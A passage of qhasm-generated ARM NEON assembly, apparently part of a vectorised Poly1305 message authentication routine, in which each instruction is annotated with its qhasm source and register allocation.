# asm 2: vshl.i32 >5y34=q12,<y34=q2,#2
vshl.i32 q12,q2,#2
# qhasm: 4x 5y12 += y12
# asm 1: vadd.i32 >5y12=reg128#12,<5y12=reg128#12,<y12=reg128#2
# asm 2: vadd.i32 >5y12=q11,<5y12=q11,<y12=q1
vadd.i32 q11,q11,q1
# qhasm: 4x 5y34 += y34
# asm 1: vadd.i32 >5y34=reg128#13,<5y34=reg128#13,<y34=reg128#3
# asm 2: vadd.i32 >5y34=q12,<5y34=q12,<y34=q2
vadd.i32 q12,q12,q2
# qhasm: 2x u4 <<= 24
# asm 1: vshl.i64 >u4=reg128#8,<u4=reg128#8,#24
# asm 2: vshl.i64 >u4=q7,<u4=q7,#24
vshl.i64 q7,q7,#24
# qhasm: 4x 5z12 = z12 << 2
# asm 1: vshl.i32 >5z12=reg128#14,<z12=reg128#5,#2
# asm 2: vshl.i32 >5z12=q13,<z12=q4,#2
vshl.i32 q13,q4,#2
# qhasm: 4x 5z34 = z34 << 2
# asm 1: vshl.i32 >5z34=reg128#15,<z34=reg128#6,#2
# asm 2: vshl.i32 >5z34=q14,<z34=q5,#2
vshl.i32 q14,q5,#2
# qhasm: 4x 5z12 += z12
# asm 1: vadd.i32 >5z12=reg128#14,<5z12=reg128#14,<z12=reg128#5
# asm 2: vadd.i32 >5z12=q13,<5z12=q13,<z12=q4
vadd.i32 q13,q13,q4
# qhasm: 4x 5z34 += z34
# asm 1: vadd.i32 >5z34=reg128#15,<5z34=reg128#15,<z34=reg128#6
# asm 2: vadd.i32 >5z34=q14,<5z34=q14,<z34=q5
vadd.i32 q14,q14,q5
# qhasm: new two24
# qhasm: new y0_stack
# qhasm: new y12_stack
# qhasm: new y34_stack
# qhasm: new 5y12_stack
# qhasm: new 5y34_stack
# qhasm: new z0_stack
# qhasm: new z12_stack
# qhasm: new z34_stack
# qhasm: new 5z12_stack
# qhasm: new 5z34_stack
# qhasm: ptr = &two24
# asm 1: lea >ptr=int32#2,<two24=stack128#1
# asm 2: lea >ptr=r1,<two24=[sp,#0]
add r1,sp,#0
# qhasm: mem128[ptr] aligned= u4
# asm 1: vst1.8 {<u4=reg128#8%bot-<u4=reg128#8%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<u4=d14-<u4=d15},[<ptr=r1,: 128]
vst1.8 {d14-d15},[r1,: 128]
# qhasm: r4 = u4
# asm 1: vmov >r4=reg128#16,<u4=reg128#8
# asm 2: vmov >r4=q15,<u4=q7
vmov q15,q7
# qhasm: r0 = u4
# asm 1: vmov >r0=reg128#8,<u4=reg128#8
# asm 2: vmov >r0=q7,<u4=q7
vmov q7,q7
# qhasm: ptr = &y0_stack
# asm 1: lea >ptr=int32#2,<y0_stack=stack128#2
# asm 2: lea >ptr=r1,<y0_stack=[sp,#16]
add r1,sp,#16
# qhasm: mem128[ptr] aligned= y0
# asm 1: vst1.8 {<y0=reg128#1%bot-<y0=reg128#1%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<y0=d0-<y0=d1},[<ptr=r1,: 128]
vst1.8 {d0-d1},[r1,: 128]
# qhasm: ptr = &y12_stack
# asm 1: lea >ptr=int32#2,<y12_stack=stack128#3
# asm 2: lea >ptr=r1,<y12_stack=[sp,#32]
add r1,sp,#32
# qhasm: mem128[ptr] aligned= y12
# asm 1: vst1.8 {<y12=reg128#2%bot-<y12=reg128#2%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<y12=d2-<y12=d3},[<ptr=r1,: 128]
vst1.8 {d2-d3},[r1,: 128]
# qhasm: ptr = &y34_stack
# asm 1: lea >ptr=int32#2,<y34_stack=stack128#4
# asm 2: lea >ptr=r1,<y34_stack=[sp,#48]
add r1,sp,#48
# qhasm: mem128[ptr] aligned= y34
# asm 1: vst1.8 {<y34=reg128#3%bot-<y34=reg128#3%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<y34=d4-<y34=d5},[<ptr=r1,: 128]
vst1.8 {d4-d5},[r1,: 128]
# qhasm: ptr = &z0_stack
# asm 1: lea >ptr=int32#2,<z0_stack=stack128#7
# asm 2: lea >ptr=r1,<z0_stack=[sp,#96]
add r1,sp,#96
# qhasm: mem128[ptr] aligned= z0
# asm 1: vst1.8 {<z0=reg128#4%bot-<z0=reg128#4%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<z0=d6-<z0=d7},[<ptr=r1,: 128]
vst1.8 {d6-d7},[r1,: 128]
# qhasm: ptr = &z12_stack
# asm 1: lea >ptr=int32#2,<z12_stack=stack128#8
# asm 2: lea >ptr=r1,<z12_stack=[sp,#112]
add r1,sp,#112
# qhasm: mem128[ptr] aligned= z12
# asm 1: vst1.8 {<z12=reg128#5%bot-<z12=reg128#5%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<z12=d8-<z12=d9},[<ptr=r1,: 128]
vst1.8 {d8-d9},[r1,: 128]
# qhasm: ptr = &z34_stack
# asm 1: lea >ptr=int32#2,<z34_stack=stack128#9
# asm 2: lea >ptr=r1,<z34_stack=[sp,#128]
add r1,sp,#128
# qhasm: mem128[ptr] aligned= z34
# asm 1: vst1.8 {<z34=reg128#6%bot-<z34=reg128#6%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<z34=d10-<z34=d11},[<ptr=r1,: 128]
vst1.8 {d10-d11},[r1,: 128]
# qhasm: ptr = &5y12_stack
# asm 1: lea >ptr=int32#2,<5y12_stack=stack128#5
# asm 2: lea >ptr=r1,<5y12_stack=[sp,#64]
add r1,sp,#64
# qhasm: mem128[ptr] aligned= 5y12
# asm 1: vst1.8 {<5y12=reg128#12%bot-<5y12=reg128#12%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5y12=d22-<5y12=d23},[<ptr=r1,: 128]
vst1.8 {d22-d23},[r1,: 128]
# qhasm: ptr = &5y34_stack
# asm 1: lea >ptr=int32#2,<5y34_stack=stack128#6
# asm 2: lea >ptr=r1,<5y34_stack=[sp,#80]
add r1,sp,#80
# qhasm: mem128[ptr] aligned= 5y34
# asm 1: vst1.8 {<5y34=reg128#13%bot-<5y34=reg128#13%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5y34=d24-<5y34=d25},[<ptr=r1,: 128]
vst1.8 {d24-d25},[r1,: 128]
# qhasm: ptr = &5z12_stack
# asm 1: lea >ptr=int32#2,<5z12_stack=stack128#10
# asm 2: lea >ptr=r1,<5z12_stack=[sp,#144]
add r1,sp,#144
# qhasm: mem128[ptr] aligned= 5z12
# asm 1: vst1.8 {<5z12=reg128#14%bot-<5z12=reg128#14%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5z12=d26-<5z12=d27},[<ptr=r1,: 128]
vst1.8 {d26-d27},[r1,: 128]
# qhasm: ptr = &5z34_stack
# asm 1: lea >ptr=int32#2,<5z34_stack=stack128#11
# asm 2: lea >ptr=r1,<5z34_stack=[sp,#160]
add r1,sp,#160
# qhasm: mem128[ptr] aligned= 5z34
# asm 1: vst1.8 {<5z34=reg128#15%bot-<5z34=reg128#15%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5z34=d28-<5z34=d29},[<ptr=r1,: 128]
vst1.8 {d28-d29},[r1,: 128]
# qhasm: unsigned>? len - 64
# asm 1: cmp <len=int32#4,#64
# asm 2: cmp <len=r3,#64
cmp r3,#64
# qhasm: goto below64bytes if !unsigned>
bls ._below64bytes
# qhasm: input_2 += 32
# asm 1: add >input_2=int32#2,<input_2=int32#3,#32
# asm 2: add >input_2=r1,<input_2=r2,#32
add r1,r2,#32
# qhasm: mainloop2:
._mainloop2:
# qhasm: c01 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c01=reg128#1%bot->c01=reg128#1%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>c01=d0->c01=d1},[<input_2=r1]!
vld1.8 {d0-d1},[r1]!
# qhasm: c23 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c23=reg128#2%bot->c23=reg128#2%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>c23=d2->c23=d3},[<input_2=r1]!
vld1.8 {d2-d3},[r1]!
# qhasm: r4[0,1] += x01[0] unsigned* z34[2]; r4[2,3] += x01[1] unsigned* z34[3]
# asm 1: vmlal.u32 <r4=reg128#16,<x01=reg128#9%bot,<z34=reg128#6%top
# asm 2: vmlal.u32 <r4=q15,<x01=d16,<z34=d11
vmlal.u32 q15,d16,d11
# qhasm: ptr = &z12_stack
# asm 1: lea >ptr=int32#3,<z12_stack=stack128#8
# asm 2: lea >ptr=r2,<z12_stack=[sp,#112]
add r2,sp,#112
# qhasm: z12 aligned= mem128[ptr]
# asm 1: vld1.8 {>z12=reg128#3%bot->z12=reg128#3%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>z12=d4->z12=d5},[<ptr=r2,: 128]
vld1.8 {d4-d5},[r2,: 128]
# qhasm: r4[0,1] += x01[2] unsigned* z34[0]; r4[2,3] += x01[3] unsigned* z34[1]
# asm 1: vmlal.u32 <r4=reg128#16,<x01=reg128#9%top,<z34=reg128#6%bot
# asm 2: vmlal.u32 <r4=q15,<x01=d17,<z34=d10
vmlal.u32 q15,d17,d10
# qhasm: ptr = &z0_stack
# asm 1: lea >ptr=int32#3,<z0_stack=stack128#7
# asm 2: lea >ptr=r2,<z0_stack=[sp,#96]
add r2,sp,#96
# qhasm: z0 aligned= mem128[ptr]
# asm 1: vld1.8 {>z0=reg128#4%bot->z0=reg128#4%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>z0=d6->z0=d7},[<ptr=r2,: 128]
vld1.8 {d6-d7},[r2,: 128]
# qhasm: r4[0,1] += x23[0] unsigned* z12[2]; r4[2,3] += x23[1] unsigned* z12[3]
# asm 1: vmlal.u32 <r4=reg128#16,<x23=reg128#10%bot,<z12=reg128#3%top
# asm 2: vmlal.u32 <r4=q15,<x23=d18,<z12=d5
vmlal.u32 q15,d18,d5
# qhasm: c01 c23 = c01[0]c01[1]c01[2]c23[2]c23[0]c23[1]c01[3]c23[3]
# asm 1: vtrn.32 <c01=reg128#1%top,<c23=reg128#2%top
# asm 2: vtrn.32 <c01=d1,<c23=d3
vtrn.32 d1,d3
# qhasm: r4[0,1] += x23[2] unsigned* z12[0]; r4[2,3] += x23[3] unsigned* z12[1]
# asm 1: vmlal.u32 <r4=reg128#16,<x23=reg128#10%top,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r4=q15,<x23=d19,<z12=d4
vmlal.u32 q15,d19,d4
# qhasm: r4[0,1] += x4[0] unsigned* z0[0]; r4[2,3] += x4[1] unsigned* z0[1]
# asm 1: vmlal.u32 <r4=reg128#16,<x4=reg128#11%bot,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r4=q15,<x4=d20,<z0=d6
vmlal.u32 q15,d20,d6
# qhasm: r3[0,1] = c23[2]<<18; r3[2,3] = c23[3]<<18
# asm 1: vshll.u32 >r3=reg128#5,<c23=reg128#2%top,#18
# asm 2: vshll.u32 >r3=q4,<c23=d3,#18
vshll.u32 q4,d3,#18
# qhasm: c01 c23 = c01[0]c23[0]c01[2]c01[3]c01[1]c23[1]c23[2]c23[3]
# asm 1: vtrn.32 <c01=reg128#1%bot,<c23=reg128#2%bot
# asm 2: vtrn.32 <c01=d0,<c23=d2
vtrn.32 d0,d2
# qhasm: r3[0,1] += x01[0] unsigned* z34[0]; r3[2,3] += x01[1] unsigned* z34[1]
# asm 1: vmlal.u32 <r3=reg128#5,<x01=reg128#9%bot,<z34=reg128#6%bot
# asm 2: vmlal.u32 <r3=q4,<x01=d16,<z34=d10
vmlal.u32 q4,d16,d10
# qhasm: r3[0,1] += x01[2] unsigned* z12[2]; r3[2,3] += x01[3] unsigned* z12[3]
# asm 1: vmlal.u32 <r3=reg128#5,<x01=reg128#9%top,<z12=reg128#3%top
# asm 2: vmlal.u32 <r3=q4,<x01=d17,<z12=d5
vmlal.u32 q4,d17,d5
# qhasm: r0 = r0[1]c01[0]r0[2,3]
# asm 1: vext.32 <r0=reg128#8%bot,<r0=reg128#8%bot,<c01=reg128#1%bot,#1
# asm 2: vext.32 <r0=d14,<r0=d14,<c01=d0,#1
vext.32 d14,d14,d0,#1
# qhasm: r3[0,1] += x23[0] unsigned* z12[0]; r3[2,3] += x23[1] unsigned* z12[1]
# asm 1: vmlal.u32 <r3=reg128#5,<x23=reg128#10%bot,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r3=q4,<x23=d18,<z12=d4
vmlal.u32 q4,d18,d4
# qhasm: input_2 -= 64
# asm 1: sub >input_2=int32#2,<input_2=int32#2,#64
# asm 2: sub >input_2=r1,<input_2=r1,#64
sub r1,r1,#64
# qhasm: r3[0,1] += x23[2] unsigned* z0[0]; r3[2,3] += x23[3] unsigned* z0[1]
# asm 1: vmlal.u32 <r3=reg128#5,<x23=reg128#10%top,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r3=q4,<x23=d19,<z0=d6
vmlal.u32 q4,d19,d6
# qhasm: ptr = &5z34_stack
# asm 1: lea >ptr=int32#3,<5z34_stack=stack128#11
# asm 2: lea >ptr=r2,<5z34_stack=[sp,#160]
add r2,sp,#160
# qhasm: 5z34 aligned= mem128[ptr]
# asm 1: vld1.8 {>5z34=reg128#6%bot->5z34=reg128#6%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5z34=d10->5z34=d11},[<ptr=r2,: 128]
vld1.8 {d10-d11},[r2,: 128]
# qhasm: r3[0,1] += x4[0] unsigned* 5z34[2]; r3[2,3] += x4[1] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r3=reg128#5,<x4=reg128#11%bot,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r3=q4,<x4=d20,<5z34=d11
vmlal.u32 q4,d20,d11
# qhasm: r0 = r0[1]r0[0]r0[3]r0[2]
# asm 1: vrev64.i32 >r0=reg128#8,<r0=reg128#8
# asm 2: vrev64.i32 >r0=q7,<r0=q7
vrev64.i32 q7,q7
# qhasm: r2[0,1] = c01[2]<<12; r2[2,3] = c01[3]<<12
# asm 1: vshll.u32 >r2=reg128#14,<c01=reg128#1%top,#12
# asm 2: vshll.u32 >r2=q13,<c01=d1,#12
vshll.u32 q13,d1,#12
# qhasm: d01 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>d01=reg128#12%bot->d01=reg128#12%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>d01=d22->d01=d23},[<input_2=r1]!
vld1.8 {d22-d23},[r1]!
# qhasm: r2[0,1] += x01[0] unsigned* z12[2]; r2[2,3] += x01[1] unsigned* z12[3]
# asm 1: vmlal.u32 <r2=reg128#14,<x01=reg128#9%bot,<z12=reg128#3%top
# asm 2: vmlal.u32 <r2=q13,<x01=d16,<z12=d5
vmlal.u32 q13,d16,d5
# qhasm: r2[0,1] += x01[2] unsigned* z12[0]; r2[2,3] += x01[3] unsigned* z12[1]
# asm 1: vmlal.u32 <r2=reg128#14,<x01=reg128#9%top,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r2=q13,<x01=d17,<z12=d4
vmlal.u32 q13,d17,d4
# qhasm: r2[0,1] += x23[0] unsigned* z0[0]; r2[2,3] += x23[1] unsigned* z0[1]
# asm 1: vmlal.u32 <r2=reg128#14,<x23=reg128#10%bot,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r2=q13,<x23=d18,<z0=d6
vmlal.u32 q13,d18,d6
# qhasm: r2[0,1] += x23[2] unsigned* 5z34[2]; r2[2,3] += x23[3] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r2=reg128#14,<x23=reg128#10%top,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r2=q13,<x23=d19,<5z34=d11
vmlal.u32 q13,d19,d11
# qhasm: r2[0,1] += x4[0] unsigned* 5z34[0]; r2[2,3] += x4[1] unsigned* 5z34[1]
# asm 1: vmlal.u32 <r2=reg128#14,<x4=reg128#11%bot,<5z34=reg128#6%bot
# asm 2: vmlal.u32 <r2=q13,<x4=d20,<5z34=d10
vmlal.u32 q13,d20,d10
# qhasm: r0 = r0[0,1]c01[1]r0[2]
# asm 1: vext.32 <r0=reg128#8%top,<c01=reg128#1%bot,<r0=reg128#8%top,#1
# asm 2: vext.32 <r0=d15,<c01=d0,<r0=d15,#1
vext.32 d15,d0,d15,#1
# qhasm: r1[0,1] = c23[0]<<6; r1[2,3] = c23[1]<<6
# asm 1: vshll.u32 >r1=reg128#15,<c23=reg128#2%bot,#6
# asm 2: vshll.u32 >r1=q14,<c23=d2,#6
vshll.u32 q14,d2,#6
# qhasm: r1[0,1] += x01[0] unsigned* z12[0]; r1[2,3] += x01[1] unsigned* z12[1]
# asm 1: vmlal.u32 <r1=reg128#15,<x01=reg128#9%bot,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r1=q14,<x01=d16,<z12=d4
vmlal.u32 q14,d16,d4
# qhasm: r1[0,1] += x01[2] unsigned* z0[0]; r1[2,3] += x01[3] unsigned* z0[1]
# asm 1: vmlal.u32 <r1=reg128#15,<x01=reg128#9%top,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r1=q14,<x01=d17,<z0=d6
vmlal.u32 q14,d17,d6
# qhasm: r1[0,1] += x23[0] unsigned* 5z34[2]; r1[2,3] += x23[1] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r1=reg128#15,<x23=reg128#10%bot,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r1=q14,<x23=d18,<5z34=d11
vmlal.u32 q14,d18,d11
# qhasm: r1[0,1] += x23[2] unsigned* 5z34[0]; r1[2,3] += x23[3] unsigned* 5z34[1]
# asm 1: vmlal.u32 <r1=reg128#15,<x23=reg128#10%top,<5z34=reg128#6%bot
# asm 2: vmlal.u32 <r1=q14,<x23=d19,<5z34=d10
vmlal.u32 q14,d19,d10
# qhasm: ptr = &5z12_stack
# asm 1: lea >ptr=int32#3,<5z12_stack=stack128#10
# asm 2: lea >ptr=r2,<5z12_stack=[sp,#144]
add r2,sp,#144
# qhasm: 5z12 aligned= mem128[ptr]
# asm 1: vld1.8 {>5z12=reg128#1%bot->5z12=reg128#1%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5z12=d0->5z12=d1},[<ptr=r2,: 128]
vld1.8 {d0-d1},[r2,: 128]
# qhasm: r1[0,1] += x4[0] unsigned* 5z12[2]; r1[2,3] += x4[1] unsigned* 5z12[3]
# asm 1: vmlal.u32 <r1=reg128#15,<x4=reg128#11%bot,<5z12=reg128#1%top
# asm 2: vmlal.u32 <r1=q14,<x4=d20,<5z12=d1
vmlal.u32 q14,d20,d1
# qhasm: d23 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>d23=reg128#2%bot->d23=reg128#2%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>d23=d2->d23=d3},[<input_2=r1]!
vld1.8 {d2-d3},[r1]!
# qhasm: input_2 += 32
# asm 1: add >input_2=int32#2,<input_2=int32#2,#32
# asm 2: add >input_2=r1,<input_2=r1,#32
add r1,r1,#32
# qhasm: r0[0,1] += x4[0] unsigned* 5z12[0]; r0[2,3] += x4[1] unsigned* 5z12[1]
# asm 1: vmlal.u32 <r0=reg128#8,<x4=reg128#11%bot,<5z12=reg128#1%bot
# asm 2: vmlal.u32 <r0=q7,<x4=d20,<5z12=d0
vmlal.u32 q7,d20,d0
# qhasm: r0[0,1] += x23[0] unsigned* 5z34[0]; r0[2,3] += x23[1] unsigned* 5z34[1]
# asm 1: vmlal.u32 <r0=reg128#8,<x23=reg128#10%bot,<5z34=reg128#6%bot
# asm 2: vmlal.u32 <r0=q7,<x23=d18,<5z34=d10
vmlal.u32 q7,d18,d10
# qhasm: d01 d23 = d01[0] d23[0] d01[1] d23[1]
# asm 1: vswp <d23=reg128#2%bot,<d01=reg128#12%top
# asm 2: vswp <d23=d2,<d01=d23
vswp d2,d23
# qhasm: r0[0,1] += x23[2] unsigned* 5z12[2]; r0[2,3] += x23[3] unsigned* 5z12[3]
# asm 1: vmlal.u32 <r0=reg128#8,<x23=reg128#10%top,<5z12=reg128#1%top
# asm 2: vmlal.u32 <r0=q7,<x23=d19,<5z12=d1
vmlal.u32 q7,d19,d1
# qhasm: r0[0,1] += x01[0] unsigned* z0[0]; r0[2,3] += x01[1] unsigned* z0[1]
# asm 1: vmlal.u32 <r0=reg128#8,<x01=reg128#9%bot,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r0=q7,<x01=d16,<z0=d6
vmlal.u32 q7,d16,d6
# qhasm: new mid
# qhasm: 2x v4 = d23 unsigned>> 40
# asm 1: vshr.u64 >v4=reg128#4,<d23=reg128#2,#40
# asm 2: vshr.u64 >v4=q3,<d23=q1,#40
vshr.u64 q3,q1,#40
# qhasm: mid = d01[1]d23[0] mid[2,3]
# asm 1: vext.32 <mid=reg128#1%bot,<d01=reg128#12%bot,<d23=reg128#2%bot,#1
# asm 2: vext.32 <mid=d0,<d01=d22,<d23=d2,#1
vext.32 d0,d22,d2,#1
# qhasm: new v23
# qhasm: v23[2] = d23[0,1] unsigned>> 14; v23[3] = d23[2,3] unsigned>> 14
# asm 1: vshrn.u64 <v23=reg128#10%top,<d23=reg128#2,#14
# asm 2: vshrn.u64 <v23=d19,<d23=q1,#14
vshrn.u64 d19,q1,#14
# qhasm: mid = mid[0,1] d01[3]d23[2]
# asm 1: vext.32 <mid=reg128#1%top,<d01=reg128#12%top,<d23=reg128#2%top,#1
# asm 2: vext.32 <mid=d1,<d01=d23,<d23=d3,#1
vext.32 d1,d23,d3,#1
# qhasm: new v01
# qhasm: v01[2] = d01[0,1] unsigned>> 26; v01[3] = d01[2,3] unsigned>> 26
# asm 1: vshrn.u64 <v01=reg128#11%top,<d01=reg128#12,#26
# asm 2: vshrn.u64 <v01=d21,<d01=q11,#26
vshrn.u64 d21,q11,#26
# qhasm: v01 = d01[1]d01[0] v01[2,3]
# asm 1: vext.32 <v01=reg128#11%bot,<d01=reg128#12%bot,<d01=reg128#12%bot,#1
# asm 2: vext.32 <v01=d20,<d01=d22,<d01=d22,#1
vext.32 d20,d22,d22,#1
# qhasm: r0[0,1] += x01[2] unsigned* 5z34[2]; r0[2,3] += x01[3] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r0=reg128#8,<x01=reg128#9%top,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r0=q7,<x01=d17,<5z34=d11
vmlal.u32 q7,d17,d11
# qhasm: v01 = v01[1]d01[2] v01[2,3]
# asm 1: vext.32 <v01=reg128#11%bot,<v01=reg128#11%bot,<d01=reg128#12%top,#1
# asm 2: vext.32 <v01=d20,<v01=d20,<d01=d23,#1
vext.32 d20,d20,d23,#1
# qhasm: v23[0] = mid[0,1] unsigned>> 20; v23[1] = mid[2,3] unsigned>> 20
# asm 1: vshrn.u64 <v23=reg128#10%bot,<mid=reg128#1,#20
# asm 2: vshrn.u64 <v23=d18,<mid=q0,#20
vshrn.u64 d18,q0,#20
# qhasm: v4 = v4[0]v4[2]v4[1]v4[3]
# asm 1: vtrn.32 <v4=reg128#4%bot,<v4=reg128#4%top
# asm 2: vtrn.32 <v4=d6,<v4=d7
vtrn.32 d6,d7
# qhasm: 4x v01 &= 0x03ffffff
# asm 1: vand.i32 <v01=reg128#11,#0x03ffffff
# asm 2: vand.i32 <v01=q10,#0x03ffffff
vand.i32 q10,#0x03ffffff
# qhasm: ptr = &y34_stack
# asm 1: lea >ptr=int32#3,<y34_stack=stack128#4
# asm 2: lea >ptr=r2,<y34_stack=[sp,#48]
add r2,sp,#48
# qhasm: y34 aligned= mem128[ptr]
# asm 1: vld1.8 {>y34=reg128#3%bot->y34=reg128#3%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>y34=d4->y34=d5},[<ptr=r2,: 128]
vld1.8 {d4-d5},[r2,: 128]
# qhasm: 4x v23 &= 0x03ffffff
# asm 1: vand.i32 <v23=reg128#10,#0x03ffffff
# asm 2: vand.i32 <v23=q9,#0x03ffffff
vand.i32 q9,#0x03ffffff
# qhasm: ptr = &y12_stack
# asm 1: lea >ptr=int32#3,<y12_stack=stack128#3
# asm 2: lea >ptr=r2,<y12_stack=[sp,#32]
add r2,sp,#32
# qhasm: y12 aligned= mem128[ptr]
# asm 1: vld1.8 {>y12=reg128#2%bot->y12=reg128#2%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>y12=d2->y12=d3},[<ptr=r2,: 128]
vld1.8 {d2-d3},[r2,: 128]
# qhasm: 4x v4 |= 0x01000000
# asm 1: vorr.i32 <v4=reg128#4,#0x01000000
# asm 2: vorr.i32 <v4=q3,#0x01000000
vorr.i32 q3,#0x01000000
# qhasm: ptr = &y0_stack
# asm 1: lea >ptr=int32#3,<y0_stack=stack128#2
# asm 2: lea >ptr=r2,<y0_stack=[sp,#16]
add r2,sp,#16
# qhasm: y0 aligned= mem128[ptr]
# asm 1: vld1.8 {>y0=reg128#1%bot->y0=reg128#1%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>y0=d0->y0=d1},[<ptr=r2,: 128]
vld1.8 {d0-d1},[r2,: 128]
# qhasm: r4[0,1] += v01[0] unsigned* y34[2]; r4[2,3] += v01[1] unsigned* y34[3]
# asm 1: vmlal.u32 <r4=reg128#16,<v01=reg128#11%bot,<y34=reg128#3%top
# asm 2: vmlal.u32 <r4=q15,<v01=d20,<y34=d5
vmlal.u32 q15,d20,d5
# qhasm: r4[0,1] += v01[2] unsigned* y34[0]; r4[2,3] += v01[3] unsigned* y34[1]
# asm 1: vmlal.u32 <r4=reg128#16,<v01=reg128#11%top,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r4=q15,<v01=d21,<y34=d4
vmlal.u32 q15,d21,d4
# qhasm: r4[0,1] += v23[0] unsigned* y12[2]; r4[2,3] += v23[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r4=reg128#16,<v23=reg128#10%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r4=q15,<v23=d18,<y12=d3
vmlal.u32 q15,d18,d3
# qhasm: r4[0,1] += v23[2] unsigned* y12[0]; r4[2,3] += v23[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r4=reg128#16,<v23=reg128#10%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r4=q15,<v23=d19,<y12=d2
vmlal.u32 q15,d19,d2
# qhasm: r4[0,1] += v4[0] unsigned* y0[0]; r4[2,3] += v4[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r4=reg128#16,<v4=reg128#4%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r4=q15,<v4=d6,<y0=d0
vmlal.u32 q15,d6,d0
# qhasm: ptr = &5y34_stack
# asm 1: lea >ptr=int32#3,<5y34_stack=stack128#6
# asm 2: lea >ptr=r2,<5y34_stack=[sp,#80]
add r2,sp,#80
# qhasm: 5y34 aligned= mem128[ptr]
# asm 1: vld1.8 {>5y34=reg128#13%bot->5y34=reg128#13%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5y34=d24->5y34=d25},[<ptr=r2,: 128]
vld1.8 {d24-d25},[r2,: 128]
# qhasm: r3[0,1] += v01[0] unsigned* y34[0]; r3[2,3] += v01[1] unsigned* y34[1]
# asm 1: vmlal.u32 <r3=reg128#5,<v01=reg128#11%bot,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r3=q4,<v01=d20,<y34=d4
vmlal.u32 q4,d20,d4
# qhasm: r3[0,1] += v01[2] unsigned* y12[2]; r3[2,3] += v01[3] unsigned* y12[3]
# asm 1: vmlal.u32 <r3=reg128#5,<v01=reg128#11%top,<y12=reg128#2%top
# asm 2: vmlal.u32 <r3=q4,<v01=d21,<y12=d3
vmlal.u32 q4,d21,d3
# qhasm: r3[0,1] += v23[0] unsigned* y12[0]; r3[2,3] += v23[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r3=reg128#5,<v23=reg128#10%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r3=q4,<v23=d18,<y12=d2
vmlal.u32 q4,d18,d2
# qhasm: r3[0,1] += v23[2] unsigned* y0[0]; r3[2,3] += v23[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r3=reg128#5,<v23=reg128#10%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r3=q4,<v23=d19,<y0=d0
vmlal.u32 q4,d19,d0
# qhasm: r3[0,1] += v4[0] unsigned* 5y34[2]; r3[2,3] += v4[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r3=reg128#5,<v4=reg128#4%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r3=q4,<v4=d6,<5y34=d25
vmlal.u32 q4,d6,d25
# qhasm: ptr = &5y12_stack
# asm 1: lea >ptr=int32#3,<5y12_stack=stack128#5
# asm 2: lea >ptr=r2,<5y12_stack=[sp,#64]
add r2,sp,#64
# qhasm: 5y12 aligned= mem128[ptr]
# asm 1: vld1.8 {>5y12=reg128#12%bot->5y12=reg128#12%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5y12=d22->5y12=d23},[<ptr=r2,: 128]
vld1.8 {d22-d23},[r2,: 128]
# qhasm: r0[0,1] += v4[0] unsigned* 5y12[0]; r0[2,3] += v4[1] unsigned* 5y12[1]
# asm 1: vmlal.u32 <r0=reg128#8,<v4=reg128#4%bot,<5y12=reg128#12%bot
# asm 2: vmlal.u32 <r0=q7,<v4=d6,<5y12=d22
vmlal.u32 q7,d6,d22
# qhasm: r0[0,1] += v23[0] unsigned* 5y34[0]; r0[2,3] += v23[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r0=reg128#8,<v23=reg128#10%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r0=q7,<v23=d18,<5y34=d24
